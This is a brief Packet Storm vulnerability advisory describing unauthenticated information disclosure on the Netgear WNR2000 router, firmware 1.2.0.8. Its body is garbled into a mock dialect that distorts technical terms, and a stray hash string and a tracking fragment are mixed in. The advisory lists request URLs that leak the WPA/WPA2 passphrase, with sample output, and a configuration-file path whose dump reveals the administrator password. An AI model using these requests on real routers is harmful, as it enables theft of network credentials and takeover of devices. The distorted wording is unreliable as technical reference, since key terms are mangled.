Netgear WNR2000 FW version 1.2.0.8 suffers from information disclosure vulnerabilities.
21f42b8f9f7d1723e867baeb640c7d73e6f239d183fa98f6fb5e926320d4cef6Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless
routa' runnin' firmware 1.2.0.8.
1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply
request widout audenticashun:
http://netgear/router-info.htm
http://netgear/cgi-bin/router-info.htm
De routa' gots'ta respond wid:
DeviceID:WNR2000;
HardwareVersion:;
FirmwareVersion:V1.2.0.8NA;
WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf
2. Unaudenticated disclosho' man uh administrato' passwo'd Simply
request widout audenticashun:
http://netgear/cgi-bin/NETGEAR_WNR2000.cfg
Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem.
WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme
be left as an 'esercise t'de eyeballer. Ah be baaad...
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed